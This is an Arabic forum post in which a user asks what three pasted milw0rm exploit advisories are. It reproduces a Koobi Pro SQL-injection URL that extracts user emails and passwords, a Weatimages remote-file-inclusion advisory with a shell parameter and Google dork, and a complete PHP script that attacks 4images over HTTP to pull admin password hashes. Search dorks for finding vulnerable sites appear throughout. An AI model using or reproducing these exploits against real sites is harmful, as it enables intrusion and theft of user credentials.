مساعدة من فظلكم في فهم شيء واحد بليييييييييييييز

السلام عليكم

اخواني انا دخلت موقع الميل ورم ادور على الثغرات في هدا السكريبت images

لكن طلعت هده

سؤالي هل هي ثغرة في الاوبرا او ماذا :a23:

[PHP]#########################################
#
# Koobi Pro V6.25 showimages (galid)
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?area"galid
#
###########################################
EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-08]/PHP]

المصدر

http://www.milw0rm.com/exploits/5414
ومادا تسمى هده ثغرة اومادا smilies2

[PHP]RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=

Author:Co-Sarper-Der
Contact:Sarperonline@gmail.com
Note:Thanx to ForeveRIslam

side note:

4. Installation

Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.

If weatimages.ini was uploaded too then the product isn't vulnerable.

# milw0rm.com [2007-04-10]/PHP]


المصدر
http://www.milw0rm.com/exploits/3700


وهده اعتقد انها هي الثغرة صحيح:00001734[1]: sql

[PHP]#!/usr/bin/php
<?php
/*
4images 1.7.x Remote SQL Injection Vulnerability

Usage: php file.php [host] [path] [table prefix] [user id]

Googledork "powered by 4images 1.7.x"

Vulnerability: Disfigure
Research: h3llfyr3
Coding: Synsta.

PoC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN

[w4ck1ng] - w4ck1ng.com
*/
if(!$argv[3]){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if(eregi("http://", $argv[1])){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if($argv[3]=="-d"){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata= explode("FROM ",$data);
$gtab = explode("WHERE ",$gdata[1]);
$tab = trim($gtab[0]);
$tab = str_replace("users","",$tab);
if(eregi("<br />", $page)){ die("Failed.."); }else{ die("Table Prefix: $tab\n"); }
}
}
if($argv[4]){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27%20union%20select%20user_password%20from%20". "$argv[3]"."users%20where%20user_id%3D%27$argv[4]";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata = explode("Unknown column '",$data);
$ghash = explode("' in 'where clause'",$gdata[1]);
$hash = $ghash[0];
if(strlen($hash) != 32){ die("Exploit failed..\n"); }else{ echo "Outputted Hash: $hash\n"; }
}
}
?>

# milw0rm.com [2006-10-08]/PHP]


المصدر

http://www.milw0rm.com/exploits/2487



اتمنى منكم افدتي ببعض المعلوما ارجوووووووووووووووووكم :a09::a09::a09::a09::a09: